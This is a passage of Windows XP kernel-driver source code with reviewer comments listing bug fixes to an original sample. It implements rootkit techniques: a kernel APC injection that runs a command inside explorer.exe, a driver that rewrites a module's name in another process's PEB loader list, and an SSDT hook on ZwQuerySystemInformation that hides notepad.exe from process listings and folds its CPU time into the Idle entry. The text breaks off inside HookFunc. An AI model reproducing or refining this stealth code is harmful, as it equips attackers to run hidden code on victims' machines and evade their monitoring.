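#define APC_WINEXEC_PATCH_OFFSET  0x1
#define APC_CMDLINE_PTR_OFFSET    0x9
#define APC_CMDLINE_OFFSET        0x14
#define APC_CMDLINE_MAX           50

/*
 * Structure offsets and the WinExec address, Windows XP x86 values.
 * NOTE(review): DependVersion() below holds Vista values but is never called
 * from this module, so the XP numbers are always in effect. All of them are
 * build-specific and a wrong value means an arbitrary kernel read/write.
 */
ULONG ActiveProcessLinksOffset = 0x88;
ULONG ImageFileNameOffset = 0x174;
ULONG ThreadListHeadOffset = 0x50;
ULONG ThreadListEntryOffset = 0x1B0;
ULONG AltertableOffset = 0x164;
ULONG WinExecOffset = 0x7C8623AD;   /* presumably kernel32!WinExec in the target process */

/* Switch the offsets above to the Vista (major version 6) values. Not called anywhere in this tree. */
void DependVersion()
{
    ULONG MajorVersion, MinorVersion;
    PsGetVersion(&MajorVersion, &MinorVersion, NULL, NULL);
    if (MajorVersion == 6)
    {
        WinExecOffset = 0x77E6E5FD;
        ActiveProcessLinksOffset = 0xb8;
        ImageFileNameOffset = 0x16C;
        ThreadListHeadOffset = 0x190;
        ThreadListEntryOffset = 0x1e0;
        AltertableOffset = 0x3C;
    }
}

/*
 * Find explorer.exe by walking ActiveProcessLinks from the current process,
 * choose one of its threads (the first alertable one, else the last one
 * seen) and queue a user-mode APC that runs lpProcess through the stub.
 *
 * lpProcess must be NUL-terminated within APC_CMDLINE_MAX bytes; anything
 * longer or unterminated is rejected. The original accepted up to 300 bytes
 * and memcpy'd them into a 50-byte slot of the stub, overwriting the rest
 * of the driver's code page.
 *
 * Fixes relative to the original: pTargetProcess, pTargetThread and
 * pNotAlertableThread are initialised (they were read uninitialised when
 * explorer.exe was not found) and the length is measured with a bound.
 *
 * NOTE(review): in the non-XP branch `(*(char*)...) & (1<<8)` is always 0
 * for a char, so that alertable test never succeeds and the fallback thread
 * is used; the intended bit cannot be recovered from this code.
 */
void RunProcess(LPSTR lpProcess)
{
    ULONG Alert;
    char *name;
    ULONG pTargetProcess = 0;
    ULONG pTargetThread = 0;
    ULONG pNotAlertableThread = 0;
    ULONG pSystemProcess;
    ULONG pTempThread;
    ULONG pNextEntry, pListHead, pThreadNextEntry, pThreadListHead;
    ULONG len;

    if (!lpProcess) return;
    for (len = 0; len < APC_CMDLINE_MAX && lpProcess[len] != '\0'; len++)
        ;
    if (len >= APC_CMDLINE_MAX) return;   /* no NUL inside the stub's string slot */

    pSystemProcess = (ULONG)PsGetCurrentProcess();
    if (!pSystemProcess)
    {
        DbgPrint("APCExec -> Cannot find System process!");
        return;
    }

    pListHead = pSystemProcess + ActiveProcessLinksOffset;
    pNextEntry = *(ULONG*)pListHead;
    if (!pNextEntry)
    {
        DbgPrint("KernelExec -> No processes found!");
        return;
    }

    while (pNextEntry != pListHead)
    {
        pSystemProcess = pNextEntry - ActiveProcessLinksOffset;
        name = (char *)pSystemProcess + ImageFileNameOffset;
        DbgPrint("ProcessName %s\n", name);
        if (_strnicmp(name, "explorer.exe", 12) == 0)
        {
            pTargetProcess = pSystemProcess;
            DbgPrint("Found explorer.exe!\n");
            pThreadListHead = pSystemProcess + ThreadListHeadOffset;
            pThreadNextEntry = *(ULONG*)pThreadListHead;
            while (pThreadNextEntry != pThreadListHead)
            {
                pTempThread = pThreadNextEntry - ThreadListEntryOffset;
                DbgPrint("ETHREAD address is : 0x%08x\n", (ULONG*)pTempThread);
                DbgPrint("Alertable is : 0x%08x", *(char*)(pTempThread + AltertableOffset));

                if (AltertableOffset == 0x164)
                {
                    Alert = *(char*)(pTempThread + AltertableOffset);
                }
                else
                {
                    Alert = (*(char*)(pTempThread + AltertableOffset)) & (1<<8);
                }
                if (Alert)
                {
                    pTargetThread = pTempThread;
                    DbgPrint("Found alertable thread!\n");
                    break;
                }
                pNotAlertableThread = pTempThread;
                pThreadNextEntry = *(ULONG*)pThreadNextEntry;
            }
            break;
        }
        pNextEntry = *(ULONG*)pNextEntry;
    }

    if (!pTargetProcess)
    {
        DbgPrint("Could not find Explorer.exe");
        return;
    }
    if (!pTargetThread)
    {
        pTargetThread = pNotAlertableThread;
    }
    if (pTargetThread)
    {
        DbgPrint("Target thread: 0x%p", pTargetThread);
        InstallUserModeApc(lpProcess, pTargetThread, pTargetProcess);
    }
    else
    {
        DbgPrint("No thread found!\n");
    }
}

/* MDL of the stub currently mapped into the target; one request in flight at a time. */
PMDL MyMDL = NULL;

/*
 * Kernel APC routine, run in the target thread just before its user-mode
 * NormalRoutine (the mapped stub). Frees the APC object and releases the MDL.
 *
 * NOTE(review): MmUnlockPages is called without MmUnmapLockedPages of the
 * user-mode view, so the stub stays mapped in the target process for that
 * process's lifetime (which is also what lets NormalRoutine run after this
 * returns). That view is a writable user mapping of the driver's own code.
 */
void ApcKernelRoutine(IN struct _KAPC *Apc,
    IN OUT PKNORMAL_ROUTINE *NormalRoutine,
    IN OUT PVOID *NormalContext,
    IN OUT PVOID *SystemArgument1,
    IN OUT PVOID *SystemArgument2)
{
    if (Apc) ExFreePool(Apc);
    if (MyMDL)
    {
        MmUnlockPages(MyMDL);
        IoFreeMdl(MyMDL);
        MyMDL = NULL;
    }
    DbgPrint("ApcKernelRoutine called!\n");
}

/*
 * Map the ApcCreateProcess stub into pTargetProcess, patch it with
 * WinExecOffset and the command line, and queue it as a user-mode APC to
 * pTargetThread.
 *
 * Returns 0 on success, STATUS_DEVICE_BUSY while a previous stub is still in
 * flight (MyMDL is a single global; the original overwrote it, so the
 * earlier APC's kernel routine would later unlock and free the wrong MDL),
 * and STATUS_UNSUCCESSFUL for bad arguments, pool/MDL/mapping failures or a
 * rejected APC. lpProcess must be NUL-terminated within APC_CMDLINE_MAX
 * bytes; RunProcess guarantees this and it is re-checked here because the
 * copy writes into the driver's own code page.
 *
 * Fixes relative to the original: MmMapLockedPagesSpecifyCache(UserMode)
 * raises rather than returning NULL and is now inside a __try; the copy is
 * bounded; the "cannot map" path unlocks the pages before freeing the MDL
 * and clears MyMDL on every failure path.
 *
 * NOTE(review): the final byte write at pTargetThread+0x4a is a raw
 * XP-specific offset (presumably ApcState.UserApcPending) with no version check.
 */
NTSTATUS InstallUserModeApc(LPSTR lpProcess, ULONG pTargetThread, ULONG pTargetProcess)
{
    PRKAPC pApc = NULL;
    PVOID pMappedAddress = NULL;
    ULONG dwSize = 0;
    KAPC_STATE ApcState;
    ULONG *data_addr = NULL;
    ULONG dwMappedAddress = 0;
    ULONG len;
    NTSTATUS status = STATUS_UNSUCCESSFUL;

    if (!pTargetProcess || !pTargetThread || !lpProcess)
    {
        return status;
    }
    for (len = 0; len < APC_CMDLINE_MAX && lpProcess[len] != '\0'; len++)
        ;
    if (len >= APC_CMDLINE_MAX)
    {
        return status;
    }
    if (MyMDL)
    {
        return STATUS_DEVICE_BUSY;   /* not atomic, but stops the obvious double use */
    }

    pApc = ExAllocatePool(NonPagedPool, sizeof(KAPC));
    if (!pApc)
    {
        DbgPrint("ExAllocatePool failed!\n");
        return status;
    }

    /* Size of the stub: relies on the linker keeping ApcCreateProcessEnd right after ApcCreateProcess. */
    dwSize = (ULONG)((unsigned char*)ApcCreateProcessEnd - (unsigned char*)ApcCreateProcess);
    MyMDL = IoAllocateMdl(ApcCreateProcess, dwSize, FALSE, FALSE, NULL);
    if (!MyMDL)
    {
        DbgPrint("Failed to allocate MDL!\n");
        ExFreePool(pApc);
        return status;
    }

    __try
    {
        MmProbeAndLockPages(MyMDL, KernelMode, IoWriteAccess);
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        DbgPrint("MmProbeAndLockPages error!\n");
        IoFreeMdl(MyMDL);
        MyMDL = NULL;
        ExFreePool(pApc);
        return status;
    }

    KeStackAttachProcess((PRKPROCESS)pTargetProcess, &ApcState);
    __try
    {
        pMappedAddress = MmMapLockedPagesSpecifyCache(MyMDL,
            UserMode, MmCached, NULL, FALSE, NormalPagePriority);
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        pMappedAddress = NULL;
    }

    if (!pMappedAddress)
    {
        DbgPrint("Cannot map address");
        KeUnstackDetachProcess(&ApcState);
        MmUnlockPages(MyMDL);
        IoFreeMdl(MyMDL);
        MyMDL = NULL;
        ExFreePool(pApc);
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("Memory at %p", pMappedAddress);

    /* Patch the stub through the user-mode view; offsets documented at APC_*_OFFSET. */
    dwMappedAddress = (ULONG)pMappedAddress;
    memset((unsigned char*)pMappedAddress + APC_CMDLINE_OFFSET, 0, APC_CMDLINE_MAX);
    memcpy((unsigned char*)pMappedAddress + APC_CMDLINE_OFFSET, lpProcess, len);
    memcpy((unsigned char*)pMappedAddress + APC_WINEXEC_PATCH_OFFSET, &WinExecOffset, sizeof(ULONG));

    data_addr = (ULONG *)((char*)pMappedAddress + APC_CMDLINE_PTR_OFFSET);
    *data_addr = dwMappedAddress + APC_CMDLINE_OFFSET;

    KeUnstackDetachProcess(&ApcState);
    KeInitializeApc(pApc,
        (PRKTHREAD)pTargetThread,
        OriginalApcEnvironment,
        &ApcKernelRoutine,
        NULL,
        (PKNORMAL_ROUTINE)pMappedAddress,
        UserMode,
        NULL);
    if (!KeInsertQueueApc(pApc, 0, NULL, 0))
    {
        DbgPrint("Failed to insert APC");
        MmUnlockPages(MyMDL);
        IoFreeMdl(MyMDL);
        MyMDL = NULL;
        ExFreePool(pApc);
        return STATUS_UNSUCCESSFUL;
    }
    else
    {
        DbgPrint("Apc delivered!\n");
    }

    if (!*(char*)(pTargetThread+0x4a))
    {
        *(char*)(pTargetThread+0x4a) = TRUE;
    }
    return 0;
}

/*
 * User-mode stub run as the APC NormalRoutine in the target thread.
 * Position independent; the two immediates and the string inside the NOP
 * sled are patched by InstallUserModeApc (see APC_*_OFFSET). The patch
 * offsets depend on this exact instruction order and encoding (a short
 * `jmp end`), so do not reorder or re-size the first instructions or
 * shorten the sled. `ret 0x0c` pops the three NormalRoutine arguments.
 */
__declspec(naked) void ApcCreateProcess(PVOID NormalContext, PVOID SystemArgument1, PVOID SystemArgument2)
{
    __asm
    {
        mov eax,0x7C8623AD     ; +0x01: replaced with WinExecOffset
        push 1                 ; second argument (1)
        nop
        push 0xabcd            ; +0x09: replaced with the address of the string at +0x14
        call eax
        jmp end
        nop                    ; sled; the string slot starts at +0x14 inside it
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
        nop
end:
        nop
        ret 0x0c
    }

}

/* End marker: its address minus ApcCreateProcess is the stub size. Assumes
 * the linker keeps the two functions adjacent and in this order. */
void ApcCreateProcessEnd()
{

}

--------------------------------------------------------------------------------
/RPC/Process.h:
--------------------------------------------------------------------------------
#include "ntifs.h"

void RunProcess(LPSTR lpProcess);

--------------------------------------------------------------------------------
/RPC/makefile:
--------------------------------------------------------------------------------
#
# DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source
# file to this component. This file merely indirects to the real make file
# that is shared by all the components of the Windows NT DDK
#

!INCLUDE $(NTMAKEENV)\makefile.def

--------------------------------------------------------------------------------
/RPC/sources:
--------------------------------------------------------------------------------
# $Id$
TARGETNAME=RPC
TARGETPATH=obj
TARGETTYPE=DRIVER

# Create browse info
#BROWSER_INFO=1
#BROWSERFILE=

# Additional defines for the C/C++ preprocessor
C_DEFINES=$(C_DEFINES)

SOURCES=APCExec.c Process.c

--------------------------------------------------------------------------------
/Ring0ChangePEB/main.c:
--------------------------------------------------------------------------------
#include "ntddk.h"

/* Exported by ntoskrnl but not declared in this DDK's ntddk.h. */
NTKERNELAPI
NTSTATUS
PsLookupProcessByProcessId(
    HANDLE ProcessId,
    PEPROCESS *Process
    );

NTKERNELAPI
VOID
KeAttachProcess (
    PEPROCESS Process
    );

NTKERNELAPI
VOID
KeDetachProcess(
    );

/* Saved originals of the renamed loader entry, restored on unload. */
wchar_t origiBaseName[1024];
wchar_t origiFullName[1024];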
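
/* User-mode loader data reached through PEB.Ldr; not in the DDK headers. */
typedef struct _PEB_LDR_DATA {
    ULONG Length;
    BOOLEAN Initialized;
    PVOID SsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

/* One loaded module as recorded by the user-mode loader (XP layout). */
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT TlsIndex;
    union {
        LIST_ENTRY HashLinks;
        struct {
            PVOID SectionPointer;
            ULONG CheckSum;
        };
    };
    union {
        struct {
            ULONG TimeDateStamp;
        };
        struct {
            PVOID LoadedImports;
        };
    };
    struct _ACTIVATION_CONTEXT * EntryPointActivationContext;
    PVOID PatchInformation;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

/*
 * Build- and session-specific constants carried over from the original
 * sample. NOTE(review): none of them is valid anywhere but the machine they
 * were read from — the PID changes every run and the offsets/base change
 * with the OS build.
 */
#define TARGET_PID           1576        /* process whose loader list is edited */
#define EPROCESS_PEB_OFFSET  0x1B0       /* EPROCESS.Peb, Windows XP x86 */
#define PEB_LDR_OFFSET       0x00C       /* PEB.Ldr */
#define TARGET_DLL_BASE      0x7C800000  /* DllBase of the entry to rename (verify against the target) */

/* Byte lengths that go with origiBaseName/origiFullName, and whether they hold anything. */
static USHORT origiBaseLength = 0;
static USHORT origiFullLength = 0;
static BOOLEAN origiSaved = FALSE;

/*
 * Copy a UNICODE_STRING (not necessarily NUL-terminated) into a
 * NUL-terminated wchar_t buffer of cchDst characters, truncating if needed.
 * Returns the number of bytes copied, excluding the terminator.
 */
static USHORT SaveUnicodeString(wchar_t *dst, ULONG cchDst, const UNICODE_STRING *src)
{
    ULONG cb = src->Length;
    ULONG cbMax = (cchDst - 1) * sizeof(wchar_t);

    if (cb > cbMax) cb = cbMax;
    RtlCopyMemory(dst, src->Buffer, cb);
    dst[cb / sizeof(wchar_t)] = L'\0';
    return (USHORT)cb;
}

/*
 * Overwrite dst's buffer in place with cbSrc bytes of src and update Length.
 * Fails (FALSE, nothing written) when the text does not fit MaximumLength.
 * A terminator is added only when there is room for it, as wcscpy used to
 * write one unconditionally.
 */
static BOOLEAN OverwriteUnicodeString(UNICODE_STRING *dst, const wchar_t *src, USHORT cbSrc)
{
    if (cbSrc > dst->MaximumLength)
        return FALSE;
    RtlCopyMemory(dst->Buffer, src, cbSrc);
    dst->Length = cbSrc;
    if ((ULONG)cbSrc + sizeof(wchar_t) <= dst->MaximumLength)
        dst->Buffer[cbSrc / sizeof(wchar_t)] = L'\0';
    return TRUE;
}

/*
 * Rename (change == TRUE) or restore (change == FALSE) the loader entry whose
 * DllBase equals TARGET_DLL_BASE in process TARGET_PID by editing the
 * FullDllName/BaseDllName strings in that process's PEB loader list.
 *
 * Returns the PsLookupProcessByProcessId status, or the exception code when
 * touching the user-mode PEB faulted (paged out, unmapped, wrong offsets).
 *
 * Fixes relative to the original:
 *  - the EPROCESS reference is dropped after KeDetachProcess; the original
 *    called ObDereferenceObject before attaching, so the process could be
 *    torn down while this code was attached to it;
 *  - names are copied by Length instead of wcscpy (UNICODE_STRING buffers
 *    need not be NUL-terminated) and bounded by the 1024-WCHAR save buffers;
 *  - the fake name is only written when it fits MaximumLength, and Length is
 *    updated so readers that honour it see "test.com" rather than
 *    "test.com" followed by the tail of the old name;
 *  - the walk stops at the list head instead of treating it as an entry;
 *  - Buffer addresses are printed with %wZ, which respects Length;
 *  - the PEB read happens inside the __try as well;
 *  - a restore with nothing saved is a no-op.
 */
NTSTATUS ModifyModuleName(BOOLEAN change)
{
    NTSTATUS status;
    PEPROCESS Process;
    ULONG ulPEB;
    PPEB_LDR_DATA pLdr;
    PLDR_DATA_TABLE_ENTRY pLdt = NULL;
    PLIST_ENTRY pList, pHead;
    wchar_t wszFakePath[] = L"test.com";
    USHORT cbFake = (USHORT)(sizeof(wszFakePath) - sizeof(wchar_t));

    status = PsLookupProcessByProcessId(
        (HANDLE)TARGET_PID,
        &Process );
    if ( status!= STATUS_SUCCESS )
    {
        DbgPrint("PsLookupProcessByProcessId = 0x%08lX",status);
        return status;
    }

    if (!change && !origiSaved)
    {
        ObDereferenceObject(Process);
        return STATUS_SUCCESS;   /* nothing was renamed, nothing to put back */
    }

    KeAttachProcess(Process);
    DbgPrint("Process : 0x%08lX. \n",Process);
    __try
    {
        ulPEB = *(ULONG *)((ULONG)Process + EPROCESS_PEB_OFFSET);
        DbgPrint("PEB : 0x%08lX. \n",ulPEB);
        pLdr = *(PPEB_LDR_DATA *)(ulPEB + PEB_LDR_OFFSET);
        DbgPrint("pLdr 0x%08lX. \n",pLdr);

        pHead = &pLdr->InLoadOrderModuleList;
        for (pList = pHead->Flink; pList != pHead; pList = pList->Flink)
        {
            pLdt = CONTAINING_RECORD(pList, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
            if ( !pLdt->EntryPoint || !pLdt->FullDllName.Buffer ||
                 !pLdt->BaseDllName.Buffer || !pLdt->DllBase )
                continue;

            DbgPrint("FullDllName : %wZ \n",&pLdt->FullDllName);
            DbgPrint("BaseDllName : %wZ \n",&pLdt->BaseDllName);
            DbgPrint("DllBase : 0x%08lX. \n",pLdt->DllBase);
            DbgPrint("DllSize : 0x%08lX. \n",pLdt->SizeOfImage);
            DbgPrint("--------------");
            if ( (ULONG)pLdt->DllBase != TARGET_DLL_BASE )
                continue;

            DbgPrint("Modify.");
            DbgPrint("--------------");
            if (change)
            {
                origiBaseLength = SaveUnicodeString(origiBaseName,
                    sizeof(origiBaseName) / sizeof(origiBaseName[0]), &pLdt->BaseDllName);
                origiFullLength = SaveUnicodeString(origiFullName,
                    sizeof(origiFullName) / sizeof(origiFullName[0]), &pLdt->FullDllName);
                origiSaved = TRUE;
                if (!OverwriteUnicodeString(&pLdt->FullDllName, wszFakePath, cbFake) ||
                    !OverwriteUnicodeString(&pLdt->BaseDllName, wszFakePath, cbFake))
                {
                    DbgPrint("fake name does not fit the loader entry's buffer\n");
                }
            }
            else
            {
                OverwriteUnicodeString(&pLdt->FullDllName, origiFullName, origiFullLength);
                OverwriteUnicodeString(&pLdt->BaseDllName, origiBaseName, origiBaseLength);
                origiSaved = FALSE;
            }
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        status = GetExceptionCode();
        DbgPrint("GetExceptionCode() = 0x%08lX. \n",status );
    }
    KeDetachProcess();
    ObDereferenceObject(Process);   /* only now: the attach above needed the object alive */

    return status;
}

/* Put the original names back before the driver, and its saved copies, go away. */
void Unload(PDRIVER_OBJECT driver)
{
    DbgPrint("Unload!\n");
    ModifyModuleName(FALSE);
}

NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg)
{
    DbgPrint("DriverEntry!\n");
    driver->DriverUnload = Unload;
    ModifyModuleName(TRUE);
    return STATUS_SUCCESS;
}

--------------------------------------------------------------------------------
/Ring0ChangePEB/makefile:
--------------------------------------------------------------------------------
#
# DO NOT EDIT THIS FILE!!! Edit .\sources.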
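if you want to add a new source
# file to this component. This file merely indirects to the real make file
# that is shared by all the components of the Windows NT DDK
#

!INCLUDE $(NTMAKEENV)\makefile.def

--------------------------------------------------------------------------------
/Ring0ChangePEB/sources:
--------------------------------------------------------------------------------
# $Id$
TARGETNAME=Ring0ChangePEB
TARGETPATH=obj
TARGETTYPE=DRIVER

# Create browse info
#BROWSER_INFO=1
#BROWSERFILE=

# Additional defines for the C/C++ preprocessor
C_DEFINES=$(C_DEFINES)

SOURCES=main.c

--------------------------------------------------------------------------------
/SSDTHook/SSDTHook.c:
--------------------------------------------------------------------------------
#include "ntddk.h"

/*
 * Service index of a Zw* stub: the imm32 of the `mov eax, <index>` that
 * opens every x86 ntoskrnl Zw stub (byte offset 1).
 * NOTE(review): x86-only encoding assumption; wrong on x64 or on a
 * hot-patched stub.
 */
#define SYSTEMINDEX(func) \
    *(PULONG)((PUCHAR)func + 1)
#define SYSTEMSERVICE(func) \
    KeServiceDescriptorTable.ServiceTableBase[SYSTEMINDEX(func)]
/* Swap the SSDT slot of func through the writable alias; old receives the previous pointer. */
#define HOOKFUNC(func, new, old) \
    old = (PVOID)InterlockedExchange( (PULONG) \
        &NewServiceDescriptorTable[SYSTEMINDEX(func)], (ULONG)new)
#define UNHOOKFUNC(func, old) \
    InterlockedExchange( (PULONG) \
        &NewServiceDescriptorTable[SYSTEMINDEX(func)], (ULONG)old)

#pragma pack(1)
typedef struct ServiceDescriptorEntry {
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase;
    unsigned int NumberOfServices;
    unsigned char *ParamTableBae;
} SSDT_ENTRY;
#pragma pack()
__declspec(dllimport) SSDT_ENTRY KeServiceDescriptorTable;

/* One element of the SystemInformationClass 8 array (one per processor). */
typedef struct _SYSTEM_PROCESSOR_TIMES
{
    LARGE_INTEGER IdleTime;
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER DpcTime;
    LARGE_INTEGER InterruptTime;
    ULONG InterruptCount;
} SYSTEM_PROCESSOR_TIMES, *PSYSTEM_PROCESSOR_TIMES;

struct _SYSTEM_THREADS
{
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientIs;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    ULONG ThreadState;
    KWAIT_REASON WaitReason;
};

/* One entry of the SystemInformationClass 5 list; NextEntryDelta == 0 marks the last one. */
typedef struct _SYSTEM_PROCESSES
{
    ULONG NextEntryDelta;
    ULONG ThreadCount;
    ULONG Reserved[6];
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ProcessName;
    KPRIORITY BasePriority;
    ULONG ProcessId;
    ULONG InheritedFromProcessId;
    ULONG HandleCount;
    ULONG Reserved2[2];
    VM_COUNTERS VmCounters;
    IO_COUNTERS IoCounters;
    struct _SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;

NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength );

typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

NTSTATUS NewFunc(
    IN ULONG SystemInformationClass ,
    IN PVOID SystemInformation ,
    IN ULONG SystemInformationLength ,
    OUT PULONG ReturnLength );

/* SystemInformationClass values NewFunc rewrites. */
#define SYSINFO_PROCESS_INFORMATION 5
#define SYSINFO_PROCESSOR_TIMES     8

PMDL MyMDL;
PVOID *NewServiceDescriptorTable;             /* writable alias of the SSDT, NULL until mapped */
LARGE_INTEGER UserTime, KernelTime, AllTime;  /* CPU time of the hidden entries in the last class-5 reply */
ZWQUERYSYSTEMINFORMATION OldFunc;             /* original service pointer, NULL until hooked */

static const WCHAR HiddenProcessName[] = L"notepad.exe";
#define HIDDEN_NAME_BYTES (sizeof(HiddenProcessName) - sizeof(WCHAR))

/* TRUE when the fixed part of a SYSTEM_PROCESSES entry at `entry` lies inside [base, base+len). */
static BOOLEAN EntryInBuffer(PUCHAR base, ULONG len, PUCHAR entry)
{
    ULONG off;
    if (entry < base) return FALSE;
    off = (ULONG)(entry - base);
    return off < len && (len - off) >= FIELD_OFFSET(SYSTEM_PROCESSES, Threads);
}

/*
 * Replacement for the ZwQuerySystemInformation service.
 *
 * Calls the original, then on success:
 *  - class 5 (process list): unlinks every entry whose name is exactly
 *    "notepad.exe" by folding its NextEntryDelta into the previous entry,
 *    sums the hidden entries' user/kernel time into UserTime/KernelTime and
 *    adds that sum to the entry with a NULL name (the Idle entry, first in
 *    the list) so the totals still add up;
 *  - class 8 (per-processor times): adds the last recorded hidden time to
 *    the first processor's IdleTime.
 *
 * Fixes relative to the original:
 *  - ProcessName.Buffer is tested for NULL before memcmp. The Idle entry has
 *    a NULL name with Length 0, so memcmp(NULL, ..., 0) returned 0 and the
 *    Idle entry was treated as notepad (its kernel time accumulated into the
 *    hidden total every call);
 *  - the name is compared by exact length, so a longer name cannot over-read
 *    the literal and a prefix such as "notepad.ex" no longer matches;
 *  - prev is not advanced past a hidden entry (with two adjacent notepad
 *    entries the second one stayed visible);
 *  - UserTime/KernelTime are a per-call snapshot instead of a running sum
 *    that grew on every query;
 *  - the buffer is user memory: every entry and every NextEntryDelta is
 *    bounds-checked against SystemInformationLength before use (a caller
 *    racing on its own buffer could otherwise steer the kernel-mode write of
 *    prev->NextEntryDelta anywhere) and all accesses are under __try.
 *
 * NOTE(review): a matching entry that is first in the list cannot be
 * unlinked (nothing precedes it) and is left visible; the original's pointer
 * arithmetic there only moved a local. Concurrent callers race on the global
 * UserTime/KernelTime.
 */
NTSTATUS NewFunc(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
    )
{
    NTSTATUS status;

    status = OldFunc(
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength );
    if (!NT_SUCCESS(status) || SystemInformation == NULL)
        return status;

    __try
    {
        if (SystemInformationClass == SYSINFO_PROCESS_INFORMATION)
        {
            PUCHAR base = (PUCHAR)SystemInformation;
            PSYSTEM_PROCESSES now = (PSYSTEM_PROCESSES)base;
            PSYSTEM_PROCESSES prev = NULL;
            PSYSTEM_PROCESSES idle = NULL;
            LARGE_INTEGER hiddenUser, hiddenKernel;

            hiddenUser.QuadPart = 0;
            hiddenKernel.QuadPart = 0;

            while (now && EntryInBuffer(base, SystemInformationLength, (PUCHAR)now))
            {
                ULONG delta = now->NextEntryDelta;
                ULONG off = (ULONG)((PUCHAR)now - base);
                PSYSTEM_PROCESSES next = NULL;
                BOOLEAN hide = FALSE;

                /* 0 = last entry; a delta that leaves the buffer is corrupt and ends the walk */
                if (delta != 0 && delta < SystemInformationLength - off)
                    next = (PSYSTEM_PROCESSES)((PUCHAR)now + delta);

                if (now->ProcessName.Buffer == NULL)
                {
                    if (!idle) idle = now;
                }
                else if (now->ProcessName.Length == HIDDEN_NAME_BYTES &&
                         memcmp(now->ProcessName.Buffer, HiddenProcessName, HIDDEN_NAME_BYTES) == 0)
                {
                    hiddenUser.QuadPart += now->UserTime.QuadPart;
                    hiddenKernel.QuadPart += now->KernelTime.QuadPart;
                    if (prev)
                    {
                        /* splice `now` out: prev jumps straight to now's successor */
                        prev->NextEntryDelta = delta ? prev->NextEntryDelta + delta : 0;
                        hide = TRUE;
                    }
                }

                if (!hide) prev = now;
                now = next;
            }

            if (idle)
            {
                idle->UserTime.QuadPart += hiddenUser.QuadPart;
                idle->KernelTime.QuadPart += hiddenKernel.QuadPart;
            }
            UserTime = hiddenUser;
            KernelTime = hiddenKernel;
        }
        else if (SystemInformationClass == SYSINFO_PROCESSOR_TIMES &&
                 SystemInformationLength >= sizeof(SYSTEM_PROCESSOR_TIMES))
        {
            PSYSTEM_PROCESSOR_TIMES times = (PSYSTEM_PROCESSOR_TIMES)SystemInformation;
            times->IdleTime.QuadPart += UserTime.QuadPart + KernelTime.QuadPart;
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        /* the caller's buffer went away under us; the original's status still stands */
    }
    return status;
}

/*
 * Build a writable kernel alias of the SSDT (ServiceTableBase,
 * NumberOfServices ULONG slots) so hooks can be installed without touching
 * CR0.WP. MDL_MAPPED_TO_SYSTEM_VA is set before mapping as in the original
 * technique.
 *
 * Returns STATUS_INSUFFICIENT_RESOURCES if the MDL or the mapping could not
 * be created; nothing is left allocated and NewServiceDescriptorTable stays
 * NULL. The original left the MmMapLockedPages result unchecked, so a NULL
 * alias was later indexed by HookFunc.
 */
NTSTATUS MAKEMyMDL()
{
    MyMDL = IoAllocateMdl(
        KeServiceDescriptorTable.ServiceTableBase,
        KeServiceDescriptorTable.NumberOfServices * sizeof(ULONG),
        FALSE, FALSE, NULL);
    if (!MyMDL) return STATUS_INSUFFICIENT_RESOURCES;

    MmBuildMdlForNonPagedPool(MyMDL);
    MyMDL->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA;
    NewServiceDescriptorTable = MmMapLockedPages(MyMDL, KernelMode);
    if (!NewServiceDescriptorTable)
    {
        IoFreeMdl(MyMDL);
        MyMDL = NULL;
        return STATUS_INSUFFICIENT_RESOURCES;
    }
    return STATUS_SUCCESS;
}

/*
 * Point the ZwQuerySystemInformation SSDT slot at NewFunc.
 * Returns FALSE and hooks nothing when the alias is not mapped or the index
 * read from the stub is outside the table (wrong stub encoding).
 */
BOOLEAN HookFunc()
{
    ULONG index = SYSTEMINDEX(ZwQuerySystemInformation);

    if (!NewServiceDescriptorTable || index >= KeServiceDescriptorTable.NumberOfServices)
        return FALSE;
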